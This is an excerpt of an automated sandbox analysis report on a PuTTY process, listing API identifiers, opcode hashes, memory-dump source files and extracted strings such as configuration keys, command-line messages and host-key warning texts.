                      • Opcode Fuzzy Hash: e97cadac6e52da1d43d57e83d769fa2f00492fef06e9a45af8a1d9a733207641
                      • Instruction Fuzzy Hash: 28F08927710B5492EA01CB57DD446655B60F7A8FE0F248471DE0C83B54DE38D9979700
                      APIs
                      Similarity
                      • API ID: TextWindow
                      • String ID:
                      • API String ID: 530164218-0
                      • Opcode ID: b85605ddeebc4c515b878ddd3bba1f08587fade2082e769378aa296b3e607999
                      • Instruction ID: e8e9c398a4296539c92a458506ffdc78b41e589feb806a13d182852222fadbee
                      • Opcode Fuzzy Hash: b85605ddeebc4c515b878ddd3bba1f08587fade2082e769378aa296b3e607999
                      • Instruction Fuzzy Hash: 4DE0E523A0904346E947DA26B4455691F80BB84BF4F818831CF0953281EF38DEC6D700
                      APIs
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: 68853461a1403baadffb08df0f75db0ede80dfcaad64afb894515b0aba0f6205
                      • Instruction ID: dfe0e85a5d3d112c59afac572fbde401d60dcd071d5f2ccaf63094be25f51d82
                      • Opcode Fuzzy Hash: 68853461a1403baadffb08df0f75db0ede80dfcaad64afb894515b0aba0f6205
                      • Instruction Fuzzy Hash: 00F05403A2A212A6FE54A7B158C56771A804F45760F290234D82EC53C6DE1CEC41655A
                      APIs
                      Similarity
                      • API ID: TextWindow
                      • String ID:
                      • API String ID: 530164218-0
                      • Opcode ID: c70fe196b795f3c47ddd80d426c3a8baf32a1ec1110fd013186a2216e6d28506
                      • Instruction ID: ea89ae6227470694891071a5886aaf8687ca3a4212cf6674d1ec2d659cd054c1
                      • Opcode Fuzzy Hash: c70fe196b795f3c47ddd80d426c3a8baf32a1ec1110fd013186a2216e6d28506
                      • Instruction Fuzzy Hash: 7DE0DF17B1A11246E887DB16B8404A90E00BB88BF1B904831CF1D97381EE3D9DC3A704
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: DirectorySystem$LibraryLoad
                      • String ID:
                      • API String ID: 2489551175-0
                      • Opcode ID: 27c62e6d549d8a15bceb22169e8481e9014216941cf5d71124ba8faee8632f71
                      • Instruction ID: 94efbb22a36da23bf60089ffaa20496af257da09b11c0aee9a9791a0c7839e9a
                      • Opcode Fuzzy Hash: 27c62e6d549d8a15bceb22169e8481e9014216941cf5d71124ba8faee8632f71
                      • Instruction Fuzzy Hash: B5E0C202F2A2AA61FC48B73B3E596AA0A500F89FD1B644830CC0E87F46EC1CAD825304
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: %d,%d,%d$%s%d$/$ANSIColour$AddressFamily$AgentFwd$AltF4$AltOnly$AltSpace$AlwaysOnTop$Answerback$ApplicationCursorKeys$ApplicationKeypad$AuthGSSAPI$AuthGSSAPIKEX$AuthKI$AuthPlugin$AuthTIS$AutoWrapMode$BCE$BackspaceIsDelete$Beep$BeepInd$BellOverload$BellOverloadN$BellOverloadS$BellOverloadT$BellWaveFile$BlinkCur$BlinkText$BoldAsColour$BugChanReq$BugDeriveKey2$BugDropStart$BugFilterKexinit$BugHMAC2$BugIgnore1$BugIgnore2$BugMaxPkt2$BugOldGex2$BugPKSessID2$BugPlainPW1$BugRSA1$BugRSAPad2$BugRSASHA2CertUserauth$BugRekey2$BugWinadj$CJKAmbigWide$CRImpliesLF$CapsLockCyr$ChangeUsername$Cipher$CloseOnExit$Colour%d$ComposeKey$Compression$ConnectionSharing$ConnectionSharingDownstream$ConnectionSharingUpstream$CtrlAltKeys$CtrlShiftCV$CtrlShiftIns$CurType$DECOriginMode$DetachedCertificate$DisableArabicShaping$DisableBidi$EraseToScrollback$FontQuality$FontVTMode$FullScreenOnAltEnter$GSSCustom$GSSLibs$GssapiFwd$GssapiRekey$HideMousePtr$HostKey$HostName$LFImpliesCR$LineCodePage$LinuxFunctionKeys$LocalEcho$LocalEdit$LocalPortAcceptAll$LocalUserName$LockSize$LogFileClash$LogFileName$LogFlush$LogHeader$LogHost$LogType$LoginShell$MouseAutocopy$MouseIsXterm$MouseOverride$MousePaste$NetHackKeypad$NoAltScreen$NoApplicationCursors$NoApplicationKeys$NoDBackspace$NoMouseReporting$NoPTY$NoRemoteCharset$NoRemoteClearScroll$NoRemoteResize$NoRemoteWinTitle$PassiveTelnet$PasteControls$PasteRTF$PingInterval$PingIntervalSecs$PortForwardings$PortNumber$PreferKnownHostKeys$Present$Printer$Protocol$ProxyDNS$ProxyExcludeList$ProxyHost$ProxyLocalhost$ProxyLogToTerm$ProxyMethod$ProxyPassword$ProxyPort$ProxyTelnetCommand$ProxyUsername$PublicKeyFile$RFCEnviron$RXVTHomeEnd$RawCNP$RectSelect$RekeyBytes$RekeyTime$RemoteCommand$RemotePortAcceptAll$RemoteQTitleAction$SSH2DES$SSHLogOmitData$SSHLogOmitPasswords$SSHManualHostKeys$SUPDUPCharset$SUPDUPLocation$SUPDUPMoreProcessing$SUPDUPScrolling$ScrollBar$ScrollBarFullScreen$ScrollOnDisp$ScrollOnKey$ScrollbackLines$ScrollbarOnLeft$SerialDataBits$SerialFlowControl$SerialLine$SerialParity$SerialSpeed$SerialStopHalfbits$ShadowBold$ShadowBoldOffset$ShiftedArrowKeys$SshBanner$SshNoAuth$SshNoShell$SshNoTrivialAuth$SshProt$StampUtmp$SunkenEdge$TCPKeepalives$TCPNoDelay$TelnetKey$TelnetRet$TermHeight$TermWidth$TerminalModes$TerminalSpeed$TerminalType$TrueColour$TryAgent$TryPalette$UTF8Override$UTF8linedraw$UseSystemColours$UserNameFromEnvironment$WarnOnClose$WideBoldFont$WideFont$WinNameAlways$WindowBorder$WindowClass$Wordness%d$X11AuthFile$X11AuthType$X11Display$X11Forward$Xterm256Colour$raw
                      • API String ID: 0-3441272646
                      • Opcode ID: e7e2492451285eaabcdf35f624091d56ce1b81eaafc784d96cb14073e079dd9f
                      • Instruction ID: bfcf42d30b03df5881fea2816e91e520663623e95072a23ae22d6cf5fa87c003
                      • Opcode Fuzzy Hash: e7e2492451285eaabcdf35f624091d56ce1b81eaafc784d96cb14073e079dd9f
                      • Instruction Fuzzy Hash: 76D26193F3821661EE04A771E8526B71A52AF80FC0FB09531DC4D8BB87DD6CE905A26D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: (Codepages supported by Windows but not listed here, such as CP866 on many systems, can be entered manually)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/config.c$About$Action of mouse buttons:$Adjust how %s displays line drawing characters$Adjust the window border$Allow selection of variable-pitch fonts$AltGr acts as Compose key$Attempt to use logical palettes$Beep using the PC speaker$Caps Lock acts as Cyrillic switch$Change font size only when maximised$Change the number of rows and columns$Change the size of the font$Character set translation on received data$ClearType$Compromise (Middle extends, Right pastes)$Connection/Proxy$Connection/SSH/X11$Control the scrollback in the window$Control use of mouse$Control-Alt is different from AltGr$Copy to clipboard in RTF as well as plain text$Custom sound file to play as a bell:$Default$Disabled$Display scrollbar in full screen mode$Enable extra keyboard features:$Ensure window is always on top$Flashing$Font has XWindows encoding$Font quality:$Font settings$Forbid resizing completely$Formatting of copied characters$Full screen on Alt-Enter$General options for colour usage$Help$Non-Antialiased$Play a custom sound file$Select X authority file$Select bell sound file$Set the size of the window$Set the style of bell$Steady$Sunken-edge border (slightly thicker)$System menu appears on ALT alone$System menu appears on ALT-Space$Taskbar/caption indication on bell:$Terminal/Bell$Terminal/Keyboard$Use font in OEM mode only$Use font in both ANSI and OEM modes$Use system colours$Wave Files (*.wav)$When window is resized:$Window$Window closes on ALT-F4$Window/Appearance$Window/Behaviour$Window/Colours$Window/Selection$Window/Selection/Copy$Window/Translation$Windows (Middle extends, Right brings up menu)$X authority file for local display$X11 forwarding$basics$c->handler == conf_radiobutton_handler$config-altf4$config-altonly$config-altspace$config-alwaysontop$config-bellstyle$config-belltaskbar$config-charset$config-compose$config-ctrlalt$config-cyr$config-font$config-fullscreen$config-logpalette$config-mouse$config-rtfcopy$config-scrollback$config-ssh-xauthority$config-syscolour$config-winborder$config-winsizelock$features$font$format$general$linedraw$main$scrollback$size$trans$tweaks$x11$xterm (Right extends, Middle pastes)
                      • API String ID: 0-2910557738
                      • Opcode ID: 680a59dbf6e0c49f472116186466a9079699f6c30498090e3e8bcadaeabe9169
                      • Instruction ID: 8e1882f631d4294e9de082e8150342a052e0c39884d6eafde3efc9c2c6267f83
                      • Opcode Fuzzy Hash: 680a59dbf6e0c49f472116186466a9079699f6c30498090e3e8bcadaeabe9169
                      • Instruction Fuzzy Hash: B9729F33A28A46A5EA10DB31F4402BB7BA1FB84784F700136DA8D87795DF3CE915E758
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: %.*s$%c%.*s$'%s' is not a valid format for a manual host key specification$-%c expects at least two colons in its argument$-agent$-cert$-hostkey$-ipv4$-ipv6$-load$-logappend$-loghost$-logoverwrite$-nc$-nc expects argument of form 'host:port'$-no-trivial-auth$-noagent$-nopageant$-nopagent$-noshare$-pageant$-pagent$-proxycmd$-pw$-pwfile$-restrict-acl$-restrict_acl$-restrictacl$-sercfg$-sessionlog$-share$-sshlog$-sshrawlog$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/cmdline.c$1.5$L%s$Unrecognised suboption "-sercfg %c"$Unrecognised suboption "-sercfg %s"$option "%s" not available in this tool$retd == 2$telnet:$the -pw option can only be used with the SSH protocol$the -pwfile option can only be used with the SSH protocol$the -sercfg option can only be used with the serial protocol$unable to open command file "%s"$unable to open password file '%s'$unable to read a password from file '%s'$unrecognised protocol prefix '%s'
                      • API String ID: 0-4105775278
                      • Opcode ID: fe1b68579080188b4da63e62e08a84ec52e6b016707625fae5bae4a074361e38
                      • Instruction ID: efc8a6457cd60ba93fba8199a2aa38165ebffef907ad74591c34c21f936ae1d6
                      • Opcode Fuzzy Hash: fe1b68579080188b4da63e62e08a84ec52e6b016707625fae5bae4a074361e38
                      • Instruction Fuzzy Hash: A8C25853F3C24361FA25A2328555BBB1E82AF85784F744030DD0EDA6DAEF6DAC05B24D
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Window$Item$Rect$Dialog$Object$Text$DestroyMessageMetricsSelectSendSystem$BrushColorCreateFontImageIndirectLoadLongModeShowStock
                      • String ID: ($<$PuTTYHostKeyMoreInfo
                      • API String ID: 3575920825-529978484
                      • Opcode ID: ee56cc1e57ec2af1323c06270b8c1a2727aa07ef82e1a07981349fbf0d6c06d2
                      • Instruction ID: 01b4f74b5e7a4101b3c27c86af37d5886354f5869f67907ac178e20c89d44143
                      • Opcode Fuzzy Hash: ee56cc1e57ec2af1323c06270b8c1a2727aa07ef82e1a07981349fbf0d6c06d2
                      • Instruction Fuzzy Hash: 1EE1823261824187FB509F66E85876BBBA1FB94BD4F104135EE4987B98CFBCD9058F04
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Object$Text$Select$CreateDeleteMetrics$Font$ColorCompatibleInfo$AlignBitmapCharsetDestroyIconImageLoadModeOutlinePixelReleaseTranslate
                      • String ID:
                      • API String ID: 3464282134-0
                      • Opcode ID: ae0eee2e33ddb7383dd445c5378252d2129dbf155ee4a47e8564913de5b98830
                      • Instruction ID: f51d0053d3c3f67a75eaa9ce3196cd96bf180542b4ad2a6cad3855416fbd7cab
                      • Opcode Fuzzy Hash: ae0eee2e33ddb7383dd445c5378252d2129dbf155ee4a47e8564913de5b98830
                      • Instruction Fuzzy Hash: 37227B37A2864296F7508B35E89436B7BA1FB94B54F300135D94AC36A8CF3CE945EF48
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Object$CompatibleCreateDeleteErrorLast$AddressBitmapBitsCurrentFormatLibraryLoadMessageProcReleaseSelect
                      • String ID: $'%s': unable to open file$($6$BM$BitBlt: %s$CreateCompatibleBitmap: %s$CreateCompatibleDC(desktop window dc): %s$DwmGetWindowAttribute$GetDC(window): %s$GetDIBits (get data): %s$SelectObject: %s$dwmapi.dll
                      • API String ID: 2770305857-4119329088
                      • Opcode ID: 4884a0e50a459711fb7455f55fb7c92575f109468ebc3c8009d0d0aa29499681
                      • Instruction ID: 89a61e1b18e45fd507391e83c37c0d3e4214fd93742aaab8a823e278286b17f7
                      • Opcode Fuzzy Hash: 4884a0e50a459711fb7455f55fb7c92575f109468ebc3c8009d0d0aa29499681
                      • Instruction Fuzzy Hash: 5EA1B627E2D642A6FA509B31A44477B6B91EF84B80F744038DD0DC7796EE3CED04AB08
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: %s (port %d)$%s Security Alert$(Storing this certified key in the cache will NOT cause its certification authority to be trusted for any other key or host.)$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/ssh/common.c$ALSO, that key does not match the key %s had previously cached for this server.$Connection abandoned.$Full text of host's public key$Host key not in manually configured list$If you do not trust this host, %s to abandon the connection.$If you trust this host, %s to add the key to %s's cache and carry on connecting.$If you want to abandon the connection completely, %s to cancel. %s is the ONLY guaranteed safe choice.$If you want to carry on connecting but without updating the cache, %s.$If you want to carry on connecting just once, without adding the key to the cache, %s.$If you were expecting this change and trust the new key, %s to update %s's cache and carry on connecting.$MD5 fingerprint$SHA256 fingerprint$Store key in cache?$The host key does not match the one %s has cached for this server:$The host key is not cached for this server:$The new %s key fingerprint is:$The server's %s key fingerprint is:$This means that either another certification authority is operating in this realm AND the server administrator has changed the host key, or you have actually connected to another computer pretending to be the server.$This means that either another certification authority is operating in this realm, or you have actually connected to another computer pretending to be the server.$This means that either the server administrator has changed the host key, or you have actually connected to another computer pretending to be the server.$This server presented a certified host key:$Update cached key?$WARNING - POTENTIAL SECURITY BREACH!$You have no guarantee that the server is the computer you think it is.$errors-cert-mismatch$errors-hostkey-absent$errors-hostkey-wrong$one$ones$storage_status == 2$which does not match the certified key %s had previously cached for this server.$which was signed by a different certification authority from the %s %s is configured to trust for this server.
                      • API String ID: 0-2815252416
                      • Opcode ID: 70ef876f86de63405cbf83a22b8533da3d34b971eb5f9bb4d786b5b93f1f2886
                      • Instruction ID: d4142c80ad5055a790a9e5d76a9dc13cfe9eabfd2bc1f8a1b178a79439a04569
                      • Opcode Fuzzy Hash: 70ef876f86de63405cbf83a22b8533da3d34b971eb5f9bb4d786b5b93f1f2886
                      • Instruction Fuzzy Hash: 4A229823A28A45A1E654DFB2D8102FB6B61FF88B84F644032DD4D93756CF3CE945E748
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: @
                      • API String ID: 0-2766056989
                      • Opcode ID: 5d5a8466f3f6bc00f5bdb877b93096f00b3f62bfa4cb63396af61df02b192291
                      • Instruction ID: ae6f84c9f5505ba7e93e522825b8f1435c27773a78c218324381915cc74aaeba
                      • Opcode Fuzzy Hash: 5d5a8466f3f6bc00f5bdb877b93096f00b3f62bfa4cb63396af61df02b192291
                      • Instruction Fuzzy Hash: 8BC2D133A2878286F7618B25E4803BA7BA1FB94754F204235DE8D937A4DF3CE944DB14
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID:
                      • String ID: -demo-config-box$Delete$Done$Load$Load, save or delete a host CA record$Main$Name for this CA (shown in log messages)$Public key for this CA record$Public key of certification authority$Read from file$SHA-1$SHA-256$SHA-512$Save$Select public key file of certification authority$Signature types (RSA keys only):$Valid hosts this key is trusted to certify$What this CA is trusted to do$config-ssh-cert-rsa-hash$config-ssh-cert-valid-expr$config-ssh-kex-cert$loadsave$options$pubkey
                      • API String ID: 0-1462184148
                      • Opcode ID: 34e667553bc6cd5c4ee18d4e1c696b99c81178fade8a5e172059cc3577174cf9
                      • Instruction ID: 5db8baeb22f11741a6e048b38205358d3f42410622bdd5f30582743d6c1846ba
                      • Opcode Fuzzy Hash: 34e667553bc6cd5c4ee18d4e1c696b99c81178fade8a5e172059cc3577174cf9
                      • Instruction Fuzzy Hash: 28D19F33A28B4265F660DB21F8043AB7B95FB84B84F600135EA8D87B96DF3CD645D748
                      APIs
                      Strings
                      • false && "bad address family in sk_newlistener_internal", xrefs: 00007FF67861023B
                      • /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c, xrefs: 00007FF678610242
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: closesocket$ErrorLast$HandleInformationbindgetaddrinfohtonslistensetsockoptsocket
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$false && "bad address family in sk_newlistener_internal"
                      • API String ID: 2773167020-2428366578
                      • Opcode ID: feb8a1541eddb833d4c022726366f701580c58f68bb48939e8cd21e056064336
                      • Instruction ID: da1b296a83894086fe9094d3961d0ec10c48065252cffb94904ff807934f9575
                      • Opcode Fuzzy Hash: feb8a1541eddb833d4c022726366f701580c58f68bb48939e8cd21e056064336
                      • Instruction Fuzzy Hash: 23B1E823E2878692FA609B35A80037BBA61FF95750F304135DA8E877D1DF7DE8849705
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmp
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: File$CreateErrorLast$AllocCloseCurrentFindHandleLocalMappingNamedPipeReadThreadWaitWindowWrite
                      • String ID: Pageant$PageantRequest%08x
                      • API String ID: 2212006894-270379698
                      • Opcode ID: d5362d0f2ebea7be41a3a41264a8c73de348efe8daebd8658956fae4e399b4db
                      • Instruction ID: dd859dd705f91d8e826de88c4a40bbbd9eac0ec38f021225e57de4292c068513
                      • Opcode Fuzzy Hash: d5362d0f2ebea7be41a3a41264a8c73de348efe8daebd8658956fae4e399b4db
                      • Instruction Fuzzy Hash: 0DB1D227B2874251EA509B36A44477B6B91FF85BD4F240530EE5E87BD6DF3CE8409708
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
